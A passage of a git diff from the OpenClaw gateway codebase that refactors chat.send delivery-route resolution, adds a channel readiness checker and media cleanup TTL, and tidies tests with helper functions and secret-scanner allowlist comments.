it("chat.inject strips external untrusted wrapper metadata from final payload text", async () => { createTranscriptFixture("openclaw-chat-inject-untrusted-meta-"); const respond = vi.fn(); @@ -362,7 +392,7 @@ describe("chat directive tag stripping for non-streaming final payloads", () => expect(extractFirstTextBlock(payload)).toBe("hello"); }); - it("chat.send inherits originating routing metadata from session delivery context", async () => { + it("chat.send keeps explicit delivery routes for channel-scoped sessions", async () => { createTranscriptFixture("openclaw-chat-send-origin-routing-"); mockState.finalText = "ok"; mockState.sessionEntry = { @@ -400,7 +430,7 @@ describe("chat directive tag stripping for non-streaming final payloads", () => ); }); - it("chat.send inherits Feishu routing metadata from session delivery context", async () => { + it("chat.send keeps explicit delivery routes for Feishu channel-scoped sessions", async () => { createTranscriptFixture("openclaw-chat-send-feishu-origin-routing-"); mockState.finalText = "ok"; mockState.sessionEntry = { @@ -429,12 +459,13 @@ describe("chat directive tag stripping for non-streaming final payloads", () => expect.objectContaining({ OriginatingChannel: "feishu", OriginatingTo: "ou_feishu_direct_123", + ExplicitDeliverRoute: true, AccountId: "default", }), ); }); - it("chat.send inherits routing metadata for per-account channel-peer session keys", async () => { + it("chat.send keeps explicit delivery routes for per-account channel-peer sessions", async () => { createTranscriptFixture("openclaw-chat-send-per-account-channel-peer-routing-"); mockState.finalText = "ok"; mockState.sessionEntry = { @@ -463,12 +494,13 @@ describe("chat directive tag stripping for non-streaming final payloads", () => expect.objectContaining({ OriginatingChannel: "telegram", OriginatingTo: "telegram:6812765697", + ExplicitDeliverRoute: true, AccountId: "account-a", }), ); }); - it("chat.send inherits routing metadata for legacy channel-peer session keys", async () => { + it("chat.send keeps explicit delivery routes for legacy channel-peer sessions", async () => { createTranscriptFixture("openclaw-chat-send-legacy-channel-peer-routing-"); mockState.finalText = "ok"; mockState.sessionEntry = { @@ -497,12 +529,13 @@ describe("chat directive tag stripping for non-streaming final payloads", () => expect.objectContaining({ OriginatingChannel: "telegram", OriginatingTo: "telegram:6812765697", + ExplicitDeliverRoute: true, AccountId: "default", }), ); }); - it("chat.send inherits routing metadata for legacy channel-peer thread session keys", async () => { + it("chat.send keeps explicit delivery routes for legacy thread sessions", async () => { createTranscriptFixture("openclaw-chat-send-legacy-thread-channel-peer-routing-"); mockState.finalText = "ok"; mockState.sessionEntry = { @@ -533,6 +566,7 @@ describe("chat directive tag stripping for non-streaming final payloads", () => expect.objectContaining({ OriginatingChannel: "telegram", OriginatingTo: "telegram:6812765697", + ExplicitDeliverRoute: true, AccountId: "default", MessageThreadId: "42", }), @@ -657,6 +691,44 @@ describe("chat directive tag stripping for non-streaming final payloads", () => ); }); + it("chat.send keeps configured main delivery inheritance when connect metadata omits client details", async () => { + createTranscriptFixture("openclaw-chat-send-config-main-connect-no-client-"); + mockState.mainSessionKey = "work"; + mockState.finalText = "ok"; + mockState.sessionEntry = { + deliveryContext: { + channel: "whatsapp", + to: "whatsapp:+8613800138000", + accountId: "default", + }, + lastChannel: "whatsapp", + lastTo: "whatsapp:+8613800138000", + lastAccountId: "default", + }; + const respond = vi.fn(); + const context = createChatContext(); + + await runNonStreamingChatSend({ + context, + respond, + idempotencyKey: "idem-config-main-connect-no-client", + client: { + connect: {}, + } as unknown, + sessionKey: "agent:main:work", + deliver: true, + expectBroadcast: false, + }); + + expect(mockState.lastDispatchCtx).toEqual( + expect.objectContaining({ + OriginatingChannel: "whatsapp", + OriginatingTo: "whatsapp:+8613800138000", + AccountId: "default", + }), + ); + }); + it("chat.send does not inherit external delivery context for non-channel custom sessions", async () => { createTranscriptFixture("openclaw-chat-send-custom-no-cross-route-"); mockState.finalText = "ok"; diff --git a/src/gateway/server-methods/chat.ts b/src/gateway/server-methods/chat.ts index e384006ae38..497902b63ff 100644 --- a/src/gateway/server-methods/chat.ts +++ b/src/gateway/server-methods/chat.ts @@ -46,6 +46,7 @@ import { validateChatInjectParams, validateChatSendParams, } from "../protocol/index.js"; +import { CHAT_SEND_SESSION_KEY_MAX_LENGTH } from "../protocol/schema/primitives.js"; import { getMaxChatHistoryMessagesBytes } from "../server-constants.js"; import { capArrayByJsonBytes, @@ -95,6 +96,118 @@ const CHANNEL_AGNOSTIC_SESSION_SCOPES = new Set([ ]); const CHANNEL_SCOPED_SESSION_SHAPES = new Set(["direct", "dm", "group", "channel"]); +type ChatSendDeliveryEntry = { + deliveryContext?: { + channel?: string; + to?: string; + accountId?: string; + threadId?: string | number; + }; + lastChannel?: string; + lastTo?: string; + lastAccountId?: string; + lastThreadId?: string | number; +}; + +type ChatSendOriginatingRoute = { + originatingChannel: string; + originatingTo?: string; + accountId?: string; + messageThreadId?: string | number; + explicitDeliverRoute: boolean; +}; + +function resolveChatSendOriginatingRoute(params: { + client?: { mode?: string | null; id?: string | null } | null; + deliver?: boolean; + entry?: ChatSendDeliveryEntry; + hasConnectedClient?: boolean; + mainKey?: string; + sessionKey: string; +}): ChatSendOriginatingRoute { + const shouldDeliverExternally = params.deliver === true; + if (!shouldDeliverExternally) { + return { + originatingChannel: INTERNAL_MESSAGE_CHANNEL, + explicitDeliverRoute: false, + }; + } + + const routeChannelCandidate = normalizeMessageChannel( + params.entry?.deliveryContext?.channel ?? params.entry?.lastChannel, + ); + const routeToCandidate = params.entry?.deliveryContext?.to ?? params.entry?.lastTo; + const routeAccountIdCandidate = + params.entry?.deliveryContext?.accountId ?? params.entry?.lastAccountId ?? undefined; + const routeThreadIdCandidate = + params.entry?.deliveryContext?.threadId ?? params.entry?.lastThreadId; + if (params.sessionKey.length > CHAT_SEND_SESSION_KEY_MAX_LENGTH) { + return { + originatingChannel: INTERNAL_MESSAGE_CHANNEL, + explicitDeliverRoute: false, + }; + } + + const parsedSessionKey = parseAgentSessionKey(params.sessionKey); + const sessionScopeParts = (parsedSessionKey?.rest ?? params.sessionKey) + .split(":", 3) + .filter(Boolean); + const sessionScopeHead = sessionScopeParts[0]; + const sessionChannelHint = normalizeMessageChannel(sessionScopeHead); + const normalizedSessionScopeHead = (sessionScopeHead ?? "").trim().toLowerCase(); + const sessionPeerShapeCandidates = [sessionScopeParts[1], sessionScopeParts[2]] + .map((part) => (part ?? "").trim().toLowerCase()) + .filter(Boolean); + const isChannelAgnosticSessionScope = CHANNEL_AGNOSTIC_SESSION_SCOPES.has( + normalizedSessionScopeHead, + ); + const isChannelScopedSession = sessionPeerShapeCandidates.some((part) => + CHANNEL_SCOPED_SESSION_SHAPES.has(part), + ); + const hasLegacyChannelPeerShape = + !isChannelScopedSession && + typeof sessionScopeParts[1] === "string" && + sessionChannelHint === routeChannelCandidate; + const isFromWebchatClient = + isWebchatClient(params.client) || params.client?.mode === GATEWAY_CLIENT_MODES.UI; + const configuredMainKey = (params.mainKey ?? "main").trim().toLowerCase(); + const isConfiguredMainSessionScope = + normalizedSessionScopeHead.length > 0 && normalizedSessionScopeHead === configuredMainKey; + + // Keep explicit delivery for channel-scoped sessions, but refuse to inherit + // stale external routes for shared-main and other channel-agnostic webchat/UI + // turns where the session key does not encode the user's current target. + // Preserve the old configured-main contract: any connected non-webchat client + // may inherit the last external route even when client metadata is absent. + const canInheritDeliverableRoute = Boolean( + sessionChannelHint && + sessionChannelHint !== INTERNAL_MESSAGE_CHANNEL && + ((!isChannelAgnosticSessionScope && (isChannelScopedSession || hasLegacyChannelPeerShape)) || + (isConfiguredMainSessionScope && params.hasConnectedClient && !isFromWebchatClient)), + ); + const hasDeliverableRoute = + canInheritDeliverableRoute && + routeChannelCandidate && + routeChannelCandidate !== INTERNAL_MESSAGE_CHANNEL && + typeof routeToCandidate === "string" && + routeToCandidate.trim().length > 0; + + if (!hasDeliverableRoute) { + return { + originatingChannel: INTERNAL_MESSAGE_CHANNEL, + explicitDeliverRoute: false, + }; + } + + return { + originatingChannel: routeChannelCandidate, + originatingTo: routeToCandidate, + accountId: routeAccountIdCandidate, + messageThreadId: routeThreadIdCandidate, + explicitDeliverRoute: true, + }; +} + function stripDisallowedChatControlChars(message: string): string { let output = ""; for (const char of message) { @@ -864,62 +977,20 @@ export const chatHandlers: GatewayRequestHandlers = { ); const commandBody = injectThinking ? `/think ${p.thinking} ${parsedMessage}` : parsedMessage; const clientInfo = client?.connect?.client; - const shouldDeliverExternally = p.deliver === true; - const routeChannelCandidate = normalizeMessageChannel( - entry?.deliveryContext?.channel ?? entry?.lastChannel, - ); - const routeToCandidate = entry?.deliveryContext?.to ?? entry?.lastTo; - const routeAccountIdCandidate = - entry?.deliveryContext?.accountId ?? entry?.lastAccountId ?? undefined; - const routeThreadIdCandidate = entry?.deliveryContext?.threadId ?? entry?.lastThreadId; - const parsedSessionKey = parseAgentSessionKey(sessionKey); - const sessionScopeParts = (parsedSessionKey?.rest ?? sessionKey).split(":").filter(Boolean); - const sessionScopeHead = sessionScopeParts[0]; - const sessionChannelHint = normalizeMessageChannel(sessionScopeHead); - const normalizedSessionScopeHead = (sessionScopeHead ?? "").trim().toLowerCase(); - const sessionPeerShapeCandidates = [sessionScopeParts[1], sessionScopeParts[2]] - .map((part) => (part ?? "").trim().toLowerCase()) - .filter(Boolean); - const isChannelAgnosticSessionScope = CHANNEL_AGNOSTIC_SESSION_SCOPES.has( - normalizedSessionScopeHead, - ); - const isChannelScopedSession = sessionPeerShapeCandidates.some((part) => - CHANNEL_SCOPED_SESSION_SHAPES.has(part), - ); - const hasLegacyChannelPeerShape = - !isChannelScopedSession && - typeof sessionScopeParts[1] === "string" && - sessionChannelHint === routeChannelCandidate; - const clientMode = client?.connect?.client?.mode; - const isFromWebchatClient = - isWebchatClient(client?.connect?.client) || clientMode === GATEWAY_CLIENT_MODES.UI; - const configuredMainKey = (cfg.session?.mainKey ?? "main").trim().toLowerCase(); - const isConfiguredMainSessionScope = - normalizedSessionScopeHead.length > 0 && normalizedSessionScopeHead === configuredMainKey; - // Channel-agnostic session scopes (main, direct:, etc.) can leak - // stale routes across surfaces. Allow configured main sessions from - // non-Webchat/UI clients (e.g., CLI, backend) to keep the last external route. - const canInheritDeliverableRoute = Boolean( - sessionChannelHint && - sessionChannelHint !== INTERNAL_MESSAGE_CHANNEL && - ((!isChannelAgnosticSessionScope && - (isChannelScopedSession || hasLegacyChannelPeerShape)) || - (isConfiguredMainSessionScope && client?.connect !== undefined && !isFromWebchatClient)), - ); - const hasDeliverableRoute = Boolean( - shouldDeliverExternally && - canInheritDeliverableRoute && - routeChannelCandidate && - routeChannelCandidate !== INTERNAL_MESSAGE_CHANNEL && - typeof routeToCandidate === "string" && - routeToCandidate.trim().length > 0, - ); - const originatingChannel = hasDeliverableRoute - ? routeChannelCandidate - : INTERNAL_MESSAGE_CHANNEL; - const originatingTo = hasDeliverableRoute ? routeToCandidate : undefined; - const accountId = hasDeliverableRoute ? routeAccountIdCandidate : undefined; - const messageThreadId = hasDeliverableRoute ? routeThreadIdCandidate : undefined; + const { + originatingChannel, + originatingTo, + accountId, + messageThreadId, + explicitDeliverRoute, + } = resolveChatSendOriginatingRoute({ + client: clientInfo, + deliver: p.deliver, + entry, + hasConnectedClient: client?.connect !== undefined, + mainKey: cfg.session?.mainKey, + sessionKey, + }); // Inject timestamp so agents know the current date/time. // Only BodyForAgent gets the timestamp — Body stays raw for UI display. // See: https://github.com/moltbot/moltbot/issues/3658 @@ -936,7 +1007,7 @@ export const chatHandlers: GatewayRequestHandlers = { Surface: INTERNAL_MESSAGE_CHANNEL, OriginatingChannel: originatingChannel, OriginatingTo: originatingTo, - ExplicitDeliverRoute: hasDeliverableRoute, + ExplicitDeliverRoute: explicitDeliverRoute, AccountId: accountId, MessageThreadId: messageThreadId, ChatType: "direct", diff --git a/src/gateway/server-methods/nodes.invoke-wake.test.ts b/src/gateway/server-methods/nodes.invoke-wake.test.ts index 39392db70b5..6e3ced97d6f 100644 --- a/src/gateway/server-methods/nodes.invoke-wake.test.ts +++ b/src/gateway/server-methods/nodes.invoke-wake.test.ts @@ -115,7 +115,7 @@ function mockSuccessfulWakeConfig(nodeId: string) { value: { teamId: "TEAM123", keyId: "KEY123", - privateKey: "-----BEGIN PRIVATE KEY-----\nabc\n-----END PRIVATE KEY-----", + privateKey: "-----BEGIN PRIVATE KEY-----\nabc\n-----END PRIVATE KEY-----", // pragma: allowlist secret }, }); mocks.sendApnsBackgroundWake.mockResolvedValue({ diff --git a/src/gateway/server-methods/nodes.ts b/src/gateway/server-methods/nodes.ts index 37433e10dfc..848fa0dfea5 100644 --- a/src/gateway/server-methods/nodes.ts +++ b/src/gateway/server-methods/nodes.ts @@ -274,20 +274,7 @@ export const nodeHandlers: GatewayRequestHandlers = { }); return; } - const p = params as { - nodeId: string; - displayName?: string; - platform?: string; - version?: string; - coreVersion?: string; - uiVersion?: string; - deviceFamily?: string; - modelIdentifier?: string; - caps?: string[]; - commands?: string[]; - remoteIp?: string; - silent?: boolean; - }; + const p = params as Parameters[0]; await respondUnavailableOnThrow(respond, async () => { const result = await requestNodePairing({ nodeId: p.nodeId, @@ -300,6 +287,7 @@ export const nodeHandlers: GatewayRequestHandlers = { modelIdentifier: p.modelIdentifier, caps: p.caps, commands: p.commands, + permissions: p.permissions, remoteIp: p.remoteIp, silent: p.silent, }); diff --git a/src/gateway/server-methods/secrets.test.ts b/src/gateway/server-methods/secrets.test.ts index 0b041d948bd..c0afd2520dc 100644 --- a/src/gateway/server-methods/secrets.test.ts +++ b/src/gateway/server-methods/secrets.test.ts @@ -17,6 +17,27 @@ async function invokeSecretsReload(params: { }); } +async function invokeSecretsResolve(params: { + handlers: ReturnType; + respond: ReturnType; + commandName: unknown; + targetIds: unknown; +}) { + await params.handlers["secrets.resolve"]({ + req: { type: "req", id: "1", method: "secrets.resolve" }, + params: { + commandName: params.commandName, + targetIds: params.targetIds, + }, + client: null, + isWebchatConnect: () => false, + respond: params.respond as unknown as Parameters< + ReturnType["secrets.resolve"] + >[0]["respond"], + context: {} as never, + }); +} + describe("secrets handlers", () => { function createHandlers(overrides?: { reloadSecrets?: () => Promise<{ warningCount: number }>; @@ -73,13 +94,11 @@ describe("secrets handlers", () => { }); const handlers = createHandlers({ resolveSecrets }); const respond = vi.fn(); - await handlers["secrets.resolve"]({ - req: { type: "req", id: "1", method: "secrets.resolve" }, - params: { commandName: "memory status", targetIds: ["talk.apiKey"] }, - client: null, - isWebchatConnect: () => false, + await invokeSecretsResolve({ + handlers, respond, - context: {} as never, + commandName: "memory status", + targetIds: ["talk.apiKey"], }); expect(resolveSecrets).toHaveBeenCalledWith({ commandName: "memory status", @@ -96,13 +115,11 @@ describe("secrets handlers", () => { it("rejects invalid secrets.resolve params", async () => { const handlers = createHandlers(); const respond = vi.fn(); - await handlers["secrets.resolve"]({ - req: { type: "req", id: "1", method: "secrets.resolve" }, - params: { commandName: "", targetIds: "bad" }, - client: null, - isWebchatConnect: () => false, + await invokeSecretsResolve({ + handlers, respond, - context: {} as never, + commandName: "", + targetIds: "bad", }); expect(respond).toHaveBeenCalledWith( false, @@ -117,13 +134,11 @@ describe("secrets handlers", () => { const resolveSecrets = vi.fn(); const handlers = createHandlers({ resolveSecrets }); const respond = vi.fn(); - await handlers["secrets.resolve"]({ - req: { type: "req", id: "1", method: "secrets.resolve" }, - params: { commandName: "memory status", targetIds: ["talk.apiKey", 12] }, - client: null, - isWebchatConnect: () => false, + await invokeSecretsResolve({ + handlers, respond, - context: {} as never, + commandName: "memory status", + targetIds: ["talk.apiKey", 12], }); expect(resolveSecrets).not.toHaveBeenCalled(); expect(respond).toHaveBeenCalledWith( @@ -140,13 +155,11 @@ describe("secrets handlers", () => { const resolveSecrets = vi.fn(); const handlers = createHandlers({ resolveSecrets }); const respond = vi.fn(); - await handlers["secrets.resolve"]({ - req: { type: "req", id: "1", method: "secrets.resolve" }, - params: { commandName: "memory status", targetIds: ["unknown.target"] }, - client: null, - isWebchatConnect: () => false, + await invokeSecretsResolve({ + handlers, respond, - context: {} as never, + commandName: "memory status", + targetIds: ["unknown.target"], }); expect(resolveSecrets).not.toHaveBeenCalled(); expect(respond).toHaveBeenCalledWith( @@ -167,13 +180,11 @@ describe("secrets handlers", () => { }); const handlers = createHandlers({ resolveSecrets }); const respond = vi.fn(); - await handlers["secrets.resolve"]({ - req: { type: "req", id: "1", method: "secrets.resolve" }, - params: { commandName: "memory status", targetIds: ["talk.apiKey"] }, - client: null, - isWebchatConnect: () => false, + await invokeSecretsResolve({ + handlers, respond, - context: {} as never, + commandName: "memory status", + targetIds: ["talk.apiKey"], }); expect(respond).toHaveBeenCalledWith( false, diff --git a/src/gateway/server-runtime-state.ts b/src/gateway/server-runtime-state.ts index 9054b3a2a3f..5733f3671e4 100644 --- a/src/gateway/server-runtime-state.ts +++ b/src/gateway/server-runtime-state.ts @@ -32,6 +32,7 @@ import { shouldEnforceGatewayAuthForPluginPath, type PluginRoutePathContext, } from "./server/plugins-http.js"; +import type { ReadinessChecker } from "./server/readiness.js"; import type { GatewayTlsRuntime } from "./server/tls.js"; import type { GatewayWsClient } from "./server/ws-types.js"; @@ -61,6 +62,7 @@ export async function createGatewayRuntimeState(params: { log: { info: (msg: string) => void; warn: (msg: string) => void }; logHooks: ReturnType; logPlugins: ReturnType; + getReadiness?: ReadinessChecker; }): Promise<{ canvasHost: CanvasHostHandler | null; httpServer: HttpServer; @@ -156,6 +158,7 @@ export async function createGatewayRuntimeState(params: { shouldEnforcePluginGatewayAuth, resolvedAuth: params.resolvedAuth, rateLimiter: params.rateLimiter, + getReadiness: params.getReadiness, tlsOptions: params.gatewayTls?.enabled ? params.gatewayTls.tlsOptions : undefined, }); try { diff --git a/src/gateway/server.auth.modes.suite.ts b/src/gateway/server.auth.modes.suite.ts index efe9ad7b111..77c23a0d0b2 100644 --- a/src/gateway/server.auth.modes.suite.ts +++ b/src/gateway/server.auth.modes.suite.ts @@ -20,7 +20,7 @@ export function registerAuthModesSuite(): void { let port: number; beforeAll(async () => { - testState.gatewayAuth = { mode: "password", password: "secret" }; + testState.gatewayAuth = { mode: "password", password: "secret" }; // pragma: allowlist secret port = await getFreePort(); server = await startGatewayServer(port); }); @@ -31,14 +31,14 @@ export function registerAuthModesSuite(): void { test("accepts password auth when configured", async () => { const ws = await openWs(port); - const res = await connectReq(ws, { password: "secret" }); + const res = await connectReq(ws, { password: "secret" }); // pragma: allowlist secret expect(res.ok).toBe(true); ws.close(); }); test("rejects invalid password", async () => { const ws = await openWs(port); - const res = await connectReq(ws, { password: "wrong" }); + const res = await connectReq(ws, { password: "wrong" }); // pragma: allowlist secret expect(res.ok).toBe(false); expect(res.error?.message ?? "").toContain("unauthorized"); ws.close(); diff --git a/src/gateway/server.cron.test.ts b/src/gateway/server.cron.test.ts index 3c6c128e11a..4a21354605d 100644 --- a/src/gateway/server.cron.test.ts +++ b/src/gateway/server.cron.test.ts @@ -151,6 +151,35 @@ async function addMainSystemEventCronJob(params: { ws: WebSocket; name: string; return expectCronJobIdFromResponse(response); } +async function addWebhookCronJob(params: { + ws: WebSocket; + name: string; + sessionTarget?: "main" | "isolated"; + payloadText?: string; + delivery: Record; +}) { + const response = await rpcReq(params.ws, "cron.add", { + name: params.name, + enabled: true, + schedule: { kind: "every", everyMs: 60_000 }, + sessionTarget: params.sessionTarget ?? "main", + wakeMode: "next-heartbeat", + payload: { + kind: params.sessionTarget === "isolated" ? "agentTurn" : "systemEvent", + ...(params.sessionTarget === "isolated" + ? { message: params.payloadText ?? "test" } + : { text: params.payloadText ?? "send webhook" }), + }, + delivery: params.delivery, + }); + return expectCronJobIdFromResponse(response); +} + +async function runCronJobForce(ws: WebSocket, id: string) { + const response = await rpcReq(ws, "cron.run", { id, mode: "force" }, 20_000); + expect(response.ok).toBe(true); +} + function getWebhookCall(index: number) { const [args] = fetchWithSsrFGuardMock.mock.calls[index] as unknown as [ { @@ -574,22 +603,12 @@ describe("gateway server cron", () => { }); expect(invalidWebhookRes.ok).toBe(false); - const notifyRes = await rpcReq(ws, "cron.add", { + const notifyJobId = await addWebhookCronJob({ + ws, name: "webhook enabled", - enabled: true, - schedule: { kind: "every", everyMs: 60_000 }, - sessionTarget: "main", - wakeMode: "next-heartbeat", - payload: { kind: "systemEvent", text: "send webhook" }, delivery: { mode: "webhook", to: "https://example.invalid/cron-finished" }, }); - expect(notifyRes.ok).toBe(true); - const notifyJobIdValue = (notifyRes.payload as { id?: unknown } | null)?.id; - const notifyJobId = typeof notifyJobIdValue === "string" ? notifyJobIdValue : ""; - expect(notifyJobId.length > 0).toBe(true); - - const notifyRunRes = await rpcReq(ws, "cron.run", { id: notifyJobId, mode: "force" }, 20_000); - expect(notifyRunRes.ok).toBe(true); + await runCronJobForce(ws, notifyJobId); await waitForCondition( () => fetchWithSsrFGuardMock.mock.calls.length === 1, @@ -644,13 +663,10 @@ describe("gateway server cron", () => { fetchWithSsrFGuardMock.mockClear(); cronIsolatedRun.mockResolvedValueOnce({ status: "error", summary: "delivery failed" }); - const failureDestRes = await rpcReq(ws, "cron.add", { + const failureDestJobId = await addWebhookCronJob({ + ws, name: "failure destination webhook", - enabled: true, - schedule: { kind: "every", everyMs: 60_000 }, sessionTarget: "isolated", - wakeMode: "next-heartbeat", - payload: { kind: "agentTurn", message: "test" }, delivery: { mode: "announce", channel: "telegram", @@ -661,19 +677,7 @@ describe("gateway server cron", () => { }, }, }); - expect(failureDestRes.ok).toBe(true); - const failureDestJobIdValue = (failureDestRes.payload as { id?: unknown } | null)?.id; - const failureDestJobId = - typeof failureDestJobIdValue === "string" ? failureDestJobIdValue : ""; - expect(failureDestJobId.length > 0).toBe(true); - - const failureDestRunRes = await rpcReq( - ws, - "cron.run", - { id: failureDestJobId, mode: "force" }, - 20_000, - ); - expect(failureDestRunRes.ok).toBe(true); + await runCronJobForce(ws, failureDestJobId); await waitForCondition( () => fetchWithSsrFGuardMock.mock.calls.length === 1, CRON_WAIT_TIMEOUT_MS, @@ -686,27 +690,13 @@ describe("gateway server cron", () => { ); cronIsolatedRun.mockResolvedValueOnce({ status: "ok", summary: "" }); - const noSummaryRes = await rpcReq(ws, "cron.add", { + const noSummaryJobId = await addWebhookCronJob({ + ws, name: "webhook no summary", - enabled: true, - schedule: { kind: "every", everyMs: 60_000 }, sessionTarget: "isolated", - wakeMode: "next-heartbeat", - payload: { kind: "agentTurn", message: "test" }, delivery: { mode: "webhook", to: "https://example.invalid/cron-finished" }, }); - expect(noSummaryRes.ok).toBe(true); - const noSummaryJobIdValue = (noSummaryRes.payload as { id?: unknown } | null)?.id; - const noSummaryJobId = typeof noSummaryJobIdValue === "string" ? noSummaryJobIdValue : ""; - expect(noSummaryJobId.length > 0).toBe(true); - - const noSummaryRunRes = await rpcReq( - ws, - "cron.run", - { id: noSummaryJobId, mode: "force" }, - 20_000, - ); - expect(noSummaryRunRes.ok).toBe(true); + await runCronJobForce(ws, noSummaryJobId); await yieldToEventLoop(); await yieldToEventLoop(); expect(fetchWithSsrFGuardMock).toHaveBeenCalledTimes(1); @@ -746,22 +736,12 @@ describe("gateway server cron", () => { await connectOk(ws); try { - const notifyRes = await rpcReq(ws, "cron.add", { + const notifyJobId = await addWebhookCronJob({ + ws, name: "webhook secretinput object", - enabled: true, - schedule: { kind: "every", everyMs: 60_000 }, - sessionTarget: "main", - wakeMode: "next-heartbeat", - payload: { kind: "systemEvent", text: "send webhook" }, delivery: { mode: "webhook", to: "https://example.invalid/cron-finished" }, }); - expect(notifyRes.ok).toBe(true); - const notifyJobIdValue = (notifyRes.payload as { id?: unknown } | null)?.id; - const notifyJobId = typeof notifyJobIdValue === "string" ? notifyJobIdValue : ""; - expect(notifyJobId.length > 0).toBe(true); - - const notifyRunRes = await rpcReq(ws, "cron.run", { id: notifyJobId, mode: "force" }, 20_000); - expect(notifyRunRes.ok).toBe(true); + await runCronJobForce(ws, notifyJobId); await waitForCondition( () => fetchWithSsrFGuardMock.mock.calls.length === 1, diff --git a/src/gateway/server.impl.ts b/src/gateway/server.impl.ts index efb95e7a7cf..1b2048b9396 100644 --- a/src/gateway/server.impl.ts +++ b/src/gateway/server.impl.ts @@ -106,6 +106,7 @@ import { incrementPresenceVersion, refreshGatewayHealthSnapshot, } from "./server/health-state.js"; +import { createReadinessChecker } from "./server/readiness.js"; import { loadGatewayTlsRuntime } from "./server/tls.js"; import { ensureGatewayStartupAuth, @@ -118,6 +119,17 @@ export { __resetModelCatalogCacheForTest } from "./server-model-catalog.js"; ensureOpenClawCliOnPath(); +const MAX_MEDIA_TTL_HOURS = 24 * 7; + +function resolveMediaCleanupTtlMs(ttlHoursRaw: number): number { + const ttlHours = Math.min(Math.max(ttlHoursRaw, 1), MAX_MEDIA_TTL_HOURS); + const ttlMs = ttlHours * 60 * 60_000; + if (!Number.isFinite(ttlMs) || !Number.isSafeInteger(ttlMs)) { + throw new Error(`Invalid media.ttlHours: ${String(ttlHoursRaw)}`); + } + return ttlMs; +} + const log = createSubsystemLogger("gateway"); const logCanvas = log.child("canvas"); const logDiscovery = log.child("discovery"); @@ -546,6 +558,17 @@ export async function startGatewayServer( if (cfgAtStart.gateway?.tls?.enabled && !gatewayTls.enabled) { throw new Error(gatewayTls.error ?? "gateway tls: failed to enable"); } + const serverStartedAt = Date.now(); + const channelManager = createChannelManager({ + loadConfig, + channelLogs, + channelRuntimeEnvs, + channelRuntime: createPluginRuntime().channel, + }); + const getReadiness = createReadinessChecker({ + channelManager, + startedAt: serverStartedAt, + }); const { canvasHost, httpServer, @@ -589,6 +612,7 @@ export async function startGatewayServer( log, logHooks, logPlugins, + getReadiness, }); let bonjourStop: (() => Promise) | null = null; const nodeRegistry = new NodeRegistry(); @@ -618,12 +642,6 @@ export async function startGatewayServer( }); let { cron, storePath: cronStorePath } = cronState; - const channelManager = createChannelManager({ - loadConfig, - channelLogs, - channelRuntimeEnvs, - channelRuntime: createPluginRuntime().channel, - }); const { getRuntimeSnapshot, startChannels, startChannel, stopChannel, markChannelLoggedOut } = channelManager; @@ -673,8 +691,9 @@ export async function startGatewayServer( let tickInterval = noopInterval(); let healthInterval = noopInterval(); let dedupeCleanup = noopInterval(); + let mediaCleanup: ReturnType | null = null; if (!minimalTestGateway) { - ({ tickInterval, healthInterval, dedupeCleanup } = startGatewayMaintenanceTimers({ + ({ tickInterval, healthInterval, dedupeCleanup, mediaCleanup } = startGatewayMaintenanceTimers({ broadcast, nodeSendToAllSubscribed, getPresenceVersion, @@ -689,6 +708,9 @@ export async function startGatewayServer( removeChatRun, agentRunSeq, nodeSendToSession, + ...(typeof cfgAtStart.media?.ttlHours === "number" + ? { mediaCleanupTtlMs: resolveMediaCleanupTtlMs(cfgAtStart.media.ttlHours) } + : {}), })); } @@ -995,6 +1017,7 @@ export async function startGatewayServer( tickInterval, healthInterval, dedupeCleanup, + mediaCleanup, agentUnsub, heartbeatUnsub, chatRunState, diff --git a/src/gateway/server.reload.test.ts b/src/gateway/server.reload.test.ts index a6fa5327628..e691256d70f 100644 --- a/src/gateway/server.reload.test.ts +++ b/src/gateway/server.reload.test.ts @@ -465,7 +465,7 @@ describe("gateway hot reload", () => { serverOptions: { auth: { mode: "password", - password: "override-password", + password: "override-password", // pragma: allowlist secret }, }, }), @@ -486,7 +486,7 @@ describe("gateway hot reload", () => { it("emits one-shot degraded and recovered system events during secret reload transitions", async () => { await writeEnvRefConfig(); - process.env.OPENAI_API_KEY = "sk-startup"; + process.env.OPENAI_API_KEY = "sk-startup"; // pragma: allowlist secret await withGatewayServer(async () => { const onHotReload = hoisted.getOnHotReload(); @@ -531,7 +531,7 @@ describe("gateway hot reload", () => { ); expect(drainSystemEvents(sessionKey)).toEqual([]); - process.env.OPENAI_API_KEY = "sk-recovered"; + process.env.OPENAI_API_KEY = "sk-recovered"; // pragma: allowlist secret await expect(onHotReload?.(plan, nextConfig)).resolves.toBeUndefined(); const recoveredEvents = drainSystemEvents(sessionKey); expect(recoveredEvents.some((event) => event.includes("[SECRETS_RELOADER_RECOVERED]"))).toBe( @@ -542,7 +542,7 @@ describe("gateway hot reload", () => { it("serves secrets.reload immediately after startup without race failures", async () => { await writeEnvRefConfig(); - process.env.OPENAI_API_KEY = "sk-startup"; + process.env.OPENAI_API_KEY = "sk-startup"; // pragma: allowlist secret const { server, ws } = await startServerWithClient(); try { await connectOk(ws); diff --git a/src/gateway/server/readiness.test.ts b/src/gateway/server/readiness.test.ts new file mode 100644 index 00000000000..9e502077d20 --- /dev/null +++ b/src/gateway/server/readiness.test.ts @@ -0,0 +1,224 @@ +import { describe, expect, it, vi } from "vitest"; +import type { ChannelId } from "../../channels/plugins/index.js"; +import type { ChannelAccountSnapshot } from "../../channels/plugins/types.js"; +import type { ChannelManager, ChannelRuntimeSnapshot } from "../server-channels.js"; +import { createReadinessChecker } from "./readiness.js"; + +function snapshotWith( + accounts: Record>, +): ChannelRuntimeSnapshot { + const channels: ChannelRuntimeSnapshot["channels"] = {}; + const channelAccounts: ChannelRuntimeSnapshot["channelAccounts"] = {}; + + for (const [channelId, accountSnapshot] of Object.entries(accounts)) { + const resolved = { accountId: "default", ...accountSnapshot } as ChannelAccountSnapshot; + channels[channelId as ChannelId] = resolved; + channelAccounts[channelId as ChannelId] = { default: resolved }; + } + + return { channels, channelAccounts }; +} + +function createManager(snapshot: ChannelRuntimeSnapshot): ChannelManager { + return { + getRuntimeSnapshot: vi.fn(() => snapshot), + startChannels: vi.fn(), + startChannel: vi.fn(), + stopChannel: vi.fn(), + markChannelLoggedOut: vi.fn(), + isManuallyStopped: vi.fn(() => false), + resetRestartAttempts: vi.fn(), + }; +} + +describe("createReadinessChecker", () => { + it("reports ready when all managed channels are healthy", () => { + vi.useFakeTimers(); + vi.setSystemTime(new Date("2026-03-06T12:00:00Z")); + const startedAt = Date.now() - 5 * 60_000; + const manager = createManager( + snapshotWith({ + discord: { + running: true, + connected: true, + enabled: true, + configured: true, + lastStartAt: startedAt, + 